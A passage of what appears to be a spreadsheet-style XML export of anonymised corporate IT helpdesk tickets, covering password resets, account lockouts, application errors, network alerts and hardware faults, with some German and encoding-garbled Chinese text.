    <s v="please add kigthuym whjtyulen (whjtlkn) and cqlehowf aosqelnr (shrghyadja) to the purchasingupstreamsso active directory (ad) group including a samaccountname in ad as all lowercase. "/>
    <s v="zqordbct lnspykfu"/>
    <x v="19"/>
  </r>
  <r>
    <s v="mobile device"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ejsxqmia.cujvlrfq@gmail.com_x000d__x000a__x000d__x000a_who do i need to contact?_x000d__x000a_having battery life issues on my i phone loosing charge fast throughout the day is it something that i can have the battery replaced on or get a new phone?_x000d__x000a__x000d__x000a_"/>
    <s v="ejsxqmia cujvlrfq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="how can i send a video to someone outside of company?"/>
    <s v="name:aytjedki rucfxpla_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:aytjedki.rucfxpla@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:how can i send a video to someone outside of company?_x000a_it is to large to attach to an email"/>
    <s v="aytjedki rucfxpla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: meeting acceptance notification "/>
    <s v="meeting acceptance notification "/>
    <s v="mfdaluin gxtkyzeb"/>
    <x v="27"/>
  </r>
  <r>
    <s v="unable to open .tif files"/>
    <s v="unable to open .tif files"/>
    <s v="wviaduqn nouqlwvz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to the switch"/>
    <s v="unable to login to the switch due to the memory issue as per syslog alarms. "/>
    <s v="wczegmok bgqoclvs"/>
    <x v="3"/>
  </r>
  <r>
    <s v="crm account and contact reassignment help."/>
    <s v="i would like to reassign accounts and contacts from myself to thomklmas (mitctdrh) ervin. _x000a__x000a_phone: "/>
    <s v="vktxjamz whbdetvp"/>
    <x v="22"/>
  </r>
  <r>
    <s v="telephony_software phone system (interaction desktop) authentication process failure"/>
    <s v="name:mitgckqf ewourgcx_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mitgckqf.ewourgcx@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:telephony_software phone system (interaction desktop) authentication process failure"/>
    <s v="mitgckqf ewourgcx"/>
    <x v="6"/>
  </r>
  <r>
    <s v="crm accrual posting not replicating from crm to ecc for cpp programdnty"/>
    <s v="fund id and budget postings affected are below._x000d__x000a__x000d__x000a_3770 211115402_x000d__x000a_3771 211115403_x000d__x000a_3772 211115404_x000d__x000a_3773 211115405_x000d__x000a_3774 211115406_x000d__x000a_3775 211115407_x000d__x000a_3776 211115408_x000d__x000a_3777 211115409_x000d__x000a_3778 211115400_x000d__x000a_3779 211115511_x000d__x000a_3780 211115512_x000d__x000a_3781 211115513_x000d__x000a_3782 211115514_x000d__x000a_3783 211115515_x000d__x000a_3784 211115516_x000d__x000a_3785 211115517_x000d__x000a_3786 211115518_x000d__x000a_3787 211115519_x000d__x000a_3788 211115510_x000d__x000a_"/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="14"/>
  </r>
  <r>
    <s v="access to database"/>
    <s v="name:mikhghytr karaffa_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vfrdxtqw.jfbmsenz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:please usa me access to the dunham and bradstreet data base."/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drive encryption attention needed"/>
    <s v="drive encryption attention needed"/>
    <s v="mwjcsiug fbwthoca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1169.company.com.is connected? is not connected"/>
    <s v="received reporting_tool alert at 1:57 pm on 8/15 et HostName_1169.company.com.is connected? is not connected"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset on ess portal"/>
    <s v="password reset on ess portal"/>
    <s v="lipcoebu eyadxbif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="expense report not reaching manager"/>
    <s v="expense report not reaching manager"/>
    <s v="znqcljxt azvoespk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc will not boot.  rqxw8516900, beshryu screen no post.  has been slow to start for a while."/>
    <s v="pc will not boot.  rqxw8516900, beshryu screen no post.  has been slow to start for a while."/>
    <s v="pmwuotcq oiuybwzg"/>
    <x v="2"/>
  </r>
  <r>
    <s v="xerox copier in usa office prtSID_69369 has a paper feeder fault, will not copy."/>
    <s v="xerox copier in usa office prtSID_69369 has a paper feeder fault, will not copy."/>
    <s v="xweclugf qmhbjsyi"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="from: jghjimdghty bfhjtuiwell _x000a_sent: monday, august 15, 2016 8:26 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar re: jghjimdghty bfhjtuiwell , your windows password is expiring soon!!_x000a_importance: high_x000a__x000a_hi it â€“ i changed my vpn password this morning when prompted and then in erp and outlook but when i go to change it per the password_management_tool pw software below â€“ the password_management_tool pw won't accept my self-service login passwords (old and new) or my email address._x000a__x000a_"/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out and password reset request."/>
    <s v="account locked out and password reset request."/>
    <s v="inermfhs bxijkepv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="ctxribfl hiwckyrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to any network from laptop"/>
    <s v="unable to connect to any network from laptop"/>
    <s v="icezpqar zbpcjfdh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="create wi-fi passwords for ibm team onsite at usa for a week"/>
    <s v="hi,_x000d__x000a__x000d__x000a_please create wi-fi passwords for all the tem members below who will be in usa, pa from 8-16-16 to 8-19-16. "/>
    <s v="qcehailo wqynckxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform issue "/>
    <s v="collaboration_platform issue "/>
    <s v="utdlmzyb dvfpraeg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook and ess due to bad password"/>
    <s v="unable to open outlook and ess due to bad password"/>
    <s v="ufxdkqbc uehvxmfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access emails"/>
    <s v="unable to access emails"/>
    <s v="xyiktbla gralexfc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zdsxmcwu thdjzolwronization issue."/>
    <s v="zdsxmcwu thdjzolwronization issue."/>
    <s v="kgqpwvzu rkexzwlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out on erp SID_34"/>
    <s v="account locked out on erp SID_34"/>
    <s v="ygowsqif mkaypzbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to engineering tool"/>
    <s v="access to engineering tool"/>
    <s v="giatndok wlzxridu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="global it-germany-erp-print of csi in vl02n does not works!"/>
    <s v="hello dear all,_x000d__x000a_i have tried to print the csi in the erp-vl02n for a 2nd time. _x000d__x000a_the message what i have got was: oops! internet explorer could not connect to HostName_523.company.company.com:20010! if anybody could help me - that would be very great. wbr-petrghada :-)"/>
    <s v="jdynzuim uapkdvgr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="HostName_973 (hr_tool tax_interface app-qa): average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)"/>
    <s v="HostName_973 (hr_tool tax_interface app-qa): average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="it-germany-h. kruse / as-400-passwortÃ¤nderung fehlgeschlagen"/>
    <s v="hallo frthdyui,_x000d__x000a_passwortÃ¤nderung in der as-400 hat nicht geklappt. bitte um deine hilfe. lieben dank im voraus-gruÃŸ petrghada :-)"/>
    <s v="jdynzuim uapkdvgr"/>
    <x v="48"/>
  </r>
  <r>
    <s v="erp access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zfburidj.jmilguev@gmail.com_x000d__x000a__x000d__x000a_hi there,_x000d__x000a__x000d__x000a_can you please give me access to erp. i cannot log on to it._x000d__x000a__x000d__x000a_"/>
    <s v="zfburidj jmilguev"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1953b"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1953b at 08/15/16 10:59:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="vip 2 : battery seems to be dead : latitude e7250"/>
    <s v="vip 2 : battery seems to be dead : latitude e7250_x000a__x000a_summary:dell laptop battery light flashing orange. laptop will not work without connection to power cord. battery seems to be dead._x000a__x000a_"/>
    <s v="nyrjkctu tbhkenlo"/>
    <x v="2"/>
  </r>
  <r>
    <s v="restart a service on the lhqSID_1854 server"/>
    <s v="restart a service on the lhqSID_1854 server_x000a__x000a_phone: -5508"/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="password issue"/>
    <s v="password issue"/>
    <s v="qmglkaru qiwhfkdv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="qmglkaru qiwhfkdv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset and unlock request "/>
    <s v="erp SID_34 password reset and unlock request  "/>
    <s v="czenblfs ochjndta"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access HostName_1274"/>
    <s v="unable to access HostName_1274"/>
    <s v="bdeplqyj fewovrcq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to launch skype"/>
    <s v="unable to launch skype"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update query on ticket inc1541161 : urgqkinl zpcokgbj"/>
    <s v="ticket update query on ticket inc1541161 : urgqkinl zpcokgbj"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to company secure"/>
    <s v="unable to connect to company secure"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="shop_floor_app record error"/>
    <s v="operator reinaldo albrecht, second shift machine ewag rs15, grinding process, pcd cell, cannot record correctly his work data on shop_floor_app there is a few days. the records of a day are extended to the next as if they had not been closed."/>
    <s v="fegahzqx bkeqfvpl"/>
    <x v="42"/>
  </r>
  <r>
    <s v="engineering_tool_dwnload prb"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rmdtqfxa.fwpnqdxo@gmail.com_x000d__x000a__x000d__x000a_hello it,_x000d__x000a__x000d__x000a_when i tried to download engineering_tool to my desktop , it is showing me this error._x000d__x000a_please fix this issue:_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1f728.ecdcf070]_x000d__x000a__x000d__x000a_best "/>
    <s v="rmdtqfxa fwpnqdxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not possible to login due to a locked account"/>
    <s v="not possible to login due to a locked account"/>
    <s v="qufjnslk bvtfrwnu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cant complete quote number "/>
    <s v="cant complete quote number _x000d__x000a_3116216659 get error massage_x000d__x000a_&quot;line item -&gt; 000010_x000d__x000a_entered brand is not listed, enter a valid brand for line item&quot; "/>
    <s v="zevqkaxh gkmohwdb"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to launch netweaver"/>
    <s v="unable to launch netweaver"/>
    <s v="wsomjhce afjkuwih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netweaver bussiness client does not open."/>
    <s v="netweaver bussiness client does not open."/>
    <s v="fgejnhux fnkymoht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool portal is not working."/>
    <s v="hr_tool portal is not working."/>
    <s v="dmxqjpay oxuwmbrt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2 : delegation issue."/>
    <s v="vip 2 : telephone:412_x000a_summary:still trying to get an issue resolved with outlook. i am tomashtgd mchectg's new assistant. he gave me editor permission for his email, calendar, etc. when i try to view his email in outlook, i get this error message &quot;cannot display the folder. microsoft outlook cannot access the specified folder location.&quot; i have to manually open his email account each time which is not going to work. i seem to be able to view his email in owa. but i want to use outlook 2013."/>
    <s v="ztnpeshl vmdyglqn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the clocks at the bottom of the hub home page seem to be missing"/>
    <s v="i tried in both ie and mozilla."/>
    <s v="gvxfymjk euioadyf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="problem with speaker"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_i'm having a problem with the speaker on my laptop. i can hear on my headset but not my earbuds or speakers. please advise_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to reset the password"/>
    <s v="unable to reset the password_x000d__x000a__x000d__x000a_"/>
    <s v="krpvcmzg gyhfalmb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call from debgrtybie savgrtyuille inc1541588 : to cancel ticket "/>
    <s v="call from debgrtybie savgrtyuille inc1541588 : to cancel ticket "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="immediate restoration of t drive files required"/>
    <s v="_x000a__x000a_received from: crkdjbot.qiztrxne@gmail.com_x000a__x000a_hello,_x000a__x000a__x000a_t:\HostName_768\teams\corporate governance and  t:\HostName_768\teams\proxyâ€¦ these folders were deleted by an it helpdesk employee over the weekend.  we need immediate restoration back to friday so these folders and all of the files contained within are restored._x000a__x000a_this is a priority request.  please respond within the hour._x000a__x000a__x000a_best,_x000a_debgrtybie savgrtyuille_x000a_sr. corporate paralegal_x000a_company inc._x000a_crkdjbot.qiztrxne@gmail.com&lt;mailto:crkdjbot.qiztrxne@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="christgrytoph called to check if account has been disabled"/>
    <s v="christgrytoph called to check if account has been disabled"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need help in resetting erp password and unlocking all accounts"/>
    <s v="need help in resetting erp password and unlocking all accounts"/>
    <s v="duoabqim vplrsbua"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account expired for cyxieuwk rekwlqmu 2nd july 2016"/>
    <s v="account expired for cyxieuwk rekwlqmu 2nd july 2016_x000a__x000a_informed user that we need email from hr that account needs to be enabled._x000a_ : account disabled."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1541444 -sao-palo-2960-switch-i(45.25.35.049) is down since 8:00 am on 08/14 et"/>
    <s v="hi uidgt/jean,_x000d__x000a__x000d__x000a_we are observing one of the switch sao-palo-2960-switch-i(45.25.35.049) is down since 8:00 am on 08/14 et. please check for the power status /cable connections for this switch and revert._x000d__x000a__x000d__x000a_note: all devices came active after the planned power maintenance as per chg1144678 _x000d__x000a__x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="62"/>
  </r>
  <r>
    <s v="password_management_tool password manager brings an error while password change attempts"/>
    <s v="password_management_tool password manager brings an error while password change attempts"/>
    <s v="dmxqjpay oxuwmbrt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform online is not opening."/>
    <s v="collaboration_platform online is not opening._x000d__x000a__x000d__x000a_error : diese seite kann nicht angezeigt warden."/>
    <s v="wczrtsja crwioekx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook (nicht lizensiertes produkt)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vnsmwqhb.ogtpenjd@gmail.com_x000d__x000a__x000d__x000a_hallo help,_x000d__x000a__x000d__x000a_ms office produkte zeigen folgende fehlermeldung:_x000d__x000a_[cid:image001.png@01d1f6f8.87161a30]_x000d__x000a__x000d__x000a_gruÃŸ / "/>
    <s v="vnsmwqhb ogtpenjd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for nvawmlch ubyjolnc on erp / production / erp"/>
    <s v="please reset my password"/>
    <s v="nvawmlch ubyjolnc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wvdxnkhf jirecvta locked out himself from windows and needs a password reset"/>
    <s v="user id : owenghyga_x000a_he was locked out while using wifi at fÃ¼rth location"/>
    <s v="wvdxnkhf jirecvta"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to boot up computer"/>
    <s v="unable to boot up computer. earlier there was a issue with blue screen.  _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_computer name: _x000d__x000a_service tag : f1gvv32_x000d__x000a__x000d__x000a_ruf nummer : 015sartlgeo lhqksbdx21 60543"/>
    <s v="wegxsmbq bvfnmjcd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="lagqkmto xqtldrcs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype issue ; ms office crashing "/>
    <s v="skype issue ; ms office crashing "/>
    <s v="ftgvlneh aitsgqwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm  -  unsafe web-side"/>
    <s v="after pw-update i've tried to lo log-on to crm._x000a__x000a_i received the following pop-up: _x000a_  soll google chrome ihr passwort fÃ¼r diese webside speichern?  skotthyutc_x000a_i've skiped that message._x000a__x000a_than i went to sales &amp; markhtyeting. after clicking on crm (english languague) i left the save web. _x000a_  i went to: _x000a_is that the side we would like to use?_x000a__x000a_i received the following pop-up:_x000a_  soll google chrome ihr passwort fÃ¼r diese webside speichern?_x000a_do we want google to save our pws?"/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="one note issue"/>
    <s v="one note issue"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock ad account "/>
    <s v="unlock ad account "/>
    <s v="qsontkux lkfnesoc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vhlepcta.lqbgcxpt@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a_abdhtyu user's account is blocked, can you please help?_x000d__x000a__x000d__x000a_"/>
    <s v="vhlepcta lqbgcxpt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi slow speed-company (apac) "/>
    <s v="it team,_x000a__x000a_please kindly check internet for us. right now unable to work. ip data as below;_x000a__x000a_copyright (c) 2009 microsoft corporation.  all rights reserved._x000a__x000a_c:\users\vvghychamc&gt;tracert 8.8.8.8_x000a__x000a_trghwyng route to google-public-dns-a.google.com [8.8.8.8]_x000a_over a maximum of 30 hops:_x000a__x000a_  1     2 ms     2 ms     2 ms  company-ap-tha-apac-dmvpn-2811-rtr01.company.com [10_x000a_.44.18.2]_x000a_  2   151 ms   150 ms   152 ms  att-singapore-3825-vpn-rtr-2.company.com [10.44.6.3_x000a_]_x000a_  3   200 ms   200 ms   201 ms  10.44.1.114_x000a_  4   152 ms   153 ms   152 ms  122.248.132.50_x000a_  5   374 ms   211 ms   212 ms  mdf002c7613r0002-tge-12-2.sng1.attens.net [32.60_x000a_.32.181]_x000a_  6   211 ms   212 ms   207 ms  32.114.188.5_x000a_  7   218 ms   217 ms   216 ms  32.119.97.150_x000a_  8   326 ms   277 ms   272 ms  as15169.ix.jpix.ad.jp [210.171.224.96]_x000a_  9   220 ms   224 ms   223 ms  72.14.234.23_x000a_10   221 ms   220 ms   220 ms  209.85.255.229_x000a_11   216 ms   217 ms   216 ms  google-public-dns-a.google.com [8.8.8.8]_x000a__x000a_trace complete._x000a__x000a_c:\users\vvghychamc&gt;_x000a__x000a_from: przndfbo pldqbhtn _x000a_sent: monday, august 15, 2016 12:59 pm_x000a_to: corpcare@trueinternet.co.th; pichayapuk (pichayapuk_num@trueinternet.co.th); gdhyrts muggftyali _x000a_cc: izwtdnfq xptuoaid_x000a_subject: wifi slow speed-company (apac) _x000a__x000a_dear k.pichayapuk,_x000a__x000a_please kindly check wi-fi speed for our company. it's very slow speed and impacted our work this time. _x000a_we have more users in office about 20 persons and some guests visit sometime. please advise suitable package for our company. _x000a_------------------------------------_x000a__x000a_dear nagfghtyudra,_x000a__x000a_attached currently internet package in apac office. please advise if we need to up speed for international gate. "/>
    <s v="przndfbo pldqbhtn"/>
    <x v="3"/>
  </r>
  <r>
    <s v="setup new ws \stwpzxbf bjehirkx"/>
    <s v="setup new ws \stwpzxbf bjehirkx"/>
    <s v="stwpzxbf bjehirkx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="aenderungsantrag kann nicht geloescht werden."/>
    <s v="aenderungsantrag kann nicht geloescht werden."/>
    <s v="gusyjcer lvbxfimr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit purchasing \xmlbfjpg yegzbvru"/>
    <s v="probleme mit purchasing \xmlbfjpg yegzbvru"/>
    <s v="xmlbfjpg yegzbvru"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \ghaltiek lsuepvyx"/>
    <s v="setup new ws \ghaltiek lsuepvyx"/>
    <s v="ghaltiek lsuepvyx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="net weaver business client does not work."/>
    <s v="net weaver business client does not work. _x000d__x000a_error : ms .net framdntyework 4.5.2"/>
    <s v="gusyjcer lvbxfimr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device (company owned) successfully activated."/>
    <s v="mobile device (company owned) successfully activated."/>
    <s v="zpsoifea wvhilrpz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool is not working "/>
    <s v="engineering tool is not working "/>
    <s v="pftsgqmc zcqiwatg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="authorisation error in outlook : nicht lizeciertes produkt."/>
    <s v="authorisation error in outlook : nicht lizeciertes produkt."/>
    <s v="ukwfgxrl rieqbtnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit EU_tool rechner \ we212772 "/>
    <s v="moin ,_x000d__x000a__x000d__x000a_kannst du bitte das passwort freischalten. benutzer we212772 wurde das passwort _x000d__x000a_gesperrt. bitte das passwort auf welcome setzen._x000d__x000a__x000d__x000a_"/>
    <s v="wjzvabrl bmcfrlyz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp SID_34 password reset request for user : beckes"/>
    <s v="erp SID_34 password reset request for user : beckes"/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit datenbank in EU_tool \hgrvubzo wgyhktic"/>
    <s v="probleme mit datenbank in EU_tool \hgrvubzo wgyhktic"/>
    <s v="hgrvubzo wgyhktic"/>
    <x v="24"/>
  </r>
  <r>
    <s v="mail address of cytohwau qfunricw at ticketing_tool is missing"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qdxyifhj.zbwtunpy@gmail.com_x000d__x000a__x000d__x000a_in ticketing_tool is for user cytohwau qfunricw no email available. see picture._x000d__x000a__x000d__x000a_[cid:image001.png@01d1f6e2.c3dff050]_x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="qdxyifhj zbwtunpy"/>
    <x v="33"/>
  </r>
  <r>
    <s v="crm not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vomtbcej.lyiwqrct@gmail.com_x000d__x000a__x000d__x000a_dear sir;_x000d__x000a__x000d__x000a_i had tried to open crm. please see here the attachment for the message while opening the same._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f6ff.3cddd780]_x000d__x000a__x000d__x000a_"/>
    <s v="vomtbcej lyiwqrct"/>
    <x v="22"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_593"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_593 at 08/15/16 04:06:29"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="business_client brings error when launched"/>
    <s v="business_client brings error when launched"/>
    <s v="nuksytoh whovmtez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="programdnty zmmtaxupd : sales organization selection crieria doesnt work; please disable programdnty temporarlly"/>
    <s v="programdnty zmmtaxupd updates tax classification for all the sales organization irrespective of selection criteria; programdnty exection impacts apo jobs; for india sales org, there are two tax classifications fields which were updated with incorrect values last week"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="9"/>
  </r>
  <r>
    <s v="windows account locked in ad"/>
    <s v="windows account locked in ad"/>
    <s v="tkglinmz dktpawfm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user is getting unlicensed error in office"/>
    <s v="user is getting unlicensed error in office"/>
    <s v="seyhanlk nuazwxgq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç­”å¤: email address link to delivery not è½¬å‘: 9168020730//supply_chaint09t308lf kc5010çš„å¿«é€’å•å·å‡ºæ¥äº†å—ï¼Ÿ"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jkmeusfq.vjpckzsa@gmail.com_x000d__x000a__x000d__x000a_helloï¼Œ_x000d__x000a_è¯·å‚¬ä¸€ä¸‹æ–°åŠ å¡ã€‚è°¢è°¢ï¼_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_é¡ºç¥å•†ç¥º_x000d__x000a_best "/>
    <s v="jkmeusfq vjpckzsa"/>
    <x v="17"/>
  </r>
  <r>
    <s v="not able to view attachments from outlook"/>
    <s v="not able to view attachments from outlook"/>
    <s v="hzagqxbf fckwrsdq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc ewkw8111185 funktioniert nicht (pc lÃ¤sst sich anschalten"/>
    <s v="von: cytohwau qfunricw _x000a_gesendet: donnerstag, 11. august 2016 15:23_x000a_an: nwfodmhc exurcwkm_x000a_betreff: pc ewkw8111185/ qdxyifhj zbwtunpy_x000a__x000a_pc ewkw8111185 funktioniert nicht (pc lÃ¤sst sich anschalten, danach ist kein arbeiten am pc mÃ¶glich, auch mit anderer tastatur versucht, keine Ã¤nderung)_x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a_cytohwau qfunricw_x000a_grinding service germany_x000a_cytohwau.qfunricw@gmail.com_x000a_"/>
    <s v="cytohwau qfunricw"/>
    <x v="32"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_483"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_483 at 08/15/16 02:52:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="issues with posting to the hub"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fmjeaoih.ndyezlkb@gmail.com_x000d__x000a__x000d__x000a_hi all,_x000d__x000a_i am having an issue posting news to the hub._x000d__x000a__x000d__x000a_when uploading new pictures for the news carousel to the site below,_x000d__x000a_the links which are created have no jpg ending and therefore when inserting_x000d__x000a_to the news carousel the pictures don't show up correctly._x000d__x000a__x000d__x000a__x000d__x000a_i would need this fixed within today as there are several news that should go out._x000d__x000a_"/>
    <s v="fmjeaoih ndyezlkb"/>
    <x v="15"/>
  </r>
  <r>
    <s v="tablet - dell 7350 -æ— æ³•è¿žæŽ¥æ— çº¿wifiç½‘ç»œï¼Œæ— çº¿apï¼Œæ‰‹æœºçƒ­ç‚¹éƒ½ä¸èƒ½è¿žæŽ¥ã€‚"/>
    <s v="please provide details of the issue._x000d__x000a_æ— æ³•è¿žæŽ¥æ— çº¿wifiç½‘ç»œï¼Œæ— çº¿apï¼Œæ‰‹æœºçƒ­ç‚¹éƒ½ä¸èƒ½è¿žæŽ¥ã€‚"/>
    <s v="dmexgspl mruzqhac"/>
    <x v="31"/>
  </r>
  <r>
    <s v="locked out of account"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ubdihsop.ahyeqpmx@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please assist vnglqiht sebxvtdj to access his account as he forgot his password._x000d__x000a__x000d__x000a_we need this urgent please?_x000d__x000a__x000d__x000a_kind "/>
    <s v="ubdihsop ahyeqpmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="require set up mobile link company e-mail"/>
    <s v="_x000a__x000a_received from: przndfbo.pldqbhtn@gmail.com_x000a__x000a_it,_x000a__x000a_please kindly set up mobile link company e-mail._x000a_user : fbmugzrl ahyiuqev_x000a_model :iphone6 (16 gb)_x000a__x000a_"/>
    <s v="przndfbo pldqbhtn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="oa35818597, inwarehouse_tool 0158921930 was created but no accounting document. please double check and help to solve this proble"/>
    <s v="oa35818597, inwarehouse_tool 0158921930 was created but no accounting document. please double check and help to solve this problem."/>
    <s v="hlrmufzx qcdzierm"/>
    <x v="17"/>
  </r>
  <r>
    <s v="vpn ä¸èƒ½ç™»å½•ï¼Œç½‘é¡µä¸€ç›´åœ¨æ£€æŸ¥é˜²ç—…æ¯’è½¯ä»¶ã€‚"/>
    <s v="vpn ä¸èƒ½ç™»å½•ï¼Œç½‘é¡µä¸€ç›´åœ¨æ£€æŸ¥é˜²ç—…æ¯’è½¯ä»¶ã€‚"/>
    <s v="eokwmfay ewbltgha"/>
    <x v="31"/>
  </r>
  <r>
    <s v="æ–‡ä»¶æ— æ³•é€šè¿‡æ‰“å°æœºfe08æ‰“å°"/>
    <s v="æ–‡ä»¶æ— æ³•é€šè¿‡æ‰“å°æœºfe08æ‰“å°"/>
    <s v="omatlyrd bvraipdt"/>
    <x v="30"/>
  </r>
  <r>
